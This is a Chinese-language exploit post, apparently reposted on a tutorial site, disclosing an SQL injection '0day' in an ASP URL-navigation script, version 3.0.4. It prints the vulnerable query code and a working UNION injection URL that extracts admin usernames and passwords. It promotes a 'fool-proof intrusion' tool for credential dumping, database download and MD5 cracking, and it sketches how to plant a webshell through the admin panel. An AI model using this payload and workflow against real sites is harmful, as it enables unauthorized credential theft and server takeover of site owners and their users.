明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

深度學(xué)習(xí)(asp)網(wǎng)址導(dǎo)航v3.0.4 0day

[摘要]んㄗ葑訫鎖愛'S Blog http://www.virusest.com/ 深度學(xué)習(xí)(asp)網(wǎng)址導(dǎo)航 v3.0.4 存在Sql注入漏洞 問(wèn)題代碼urlGo.asp: <!...

んㄗ葑訫鎖愛'S  Blog  http://www.virusest.com/

深度學(xué)習(xí)(asp)網(wǎng)址導(dǎo)航 v3.0.4 存在Sql注入漏洞

問(wèn)題代碼urlGo.asp:

<!--#include file="connDB.asp"-->

<!--#include file="include/Function.Common.asp"-->

<%

id=request.QueryString("id")

if id="" then

 response.Redirect("/")

end if

'-----網(wǎng)址--------------

Set rsWebUrl=Server.CreateObject("Adodb.Recordset")

sqlC="select  * from tWebUrl where fpassed=1 and fid=" & id

rsWebUrl.open sQLC,conn,0,1

if rsWebUrl.Eof and rsWebUrl.Bof then

 response.Redirect("/")

else

%>

很明顯,可以注入,而且頭文件由于程序員疏忽,很配合的沒(méi)調(diào)用防注入系統(tǒng).其他文件均調(diào)用防注入.

利用:注意注入點(diǎn)用明小子或者啊D檢測(cè)不出來(lái),簡(jiǎn)單寫下注入語(yǔ)句:

http://localhost/urlGo.asp?id=4233%20and%201=2%20union%20select%201,2,fusername,4,5,6,7,8,9,10%20from%20tAdmin

查密碼只需把fusername改成fpassword,但是在測(cè)試的時(shí)候,發(fā)現(xiàn)因版本不同,可能表段長(zhǎng)度不同,如果提示列數(shù)不匹配,則換成9個(gè)即可.

這里我寫了利用工具,傻瓜式入侵,其中,ID值為在搜索引擎中看到的ID,如圖:

工具集成了暴密碼賬號(hào),后臺(tái)訪問(wèn),數(shù)據(jù)庫(kù)下載MD5破解等功能,工具和源碼見附件.

未加殼,歡迎篡改版權(quán)!好久沒(méi)寫程序了,就當(dāng)練手吧!

Ps:后臺(tái)拿Shell比較費(fèi)勁,提示空殼數(shù)據(jù)庫(kù),先恢復(fù)在備份,再一句話!


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。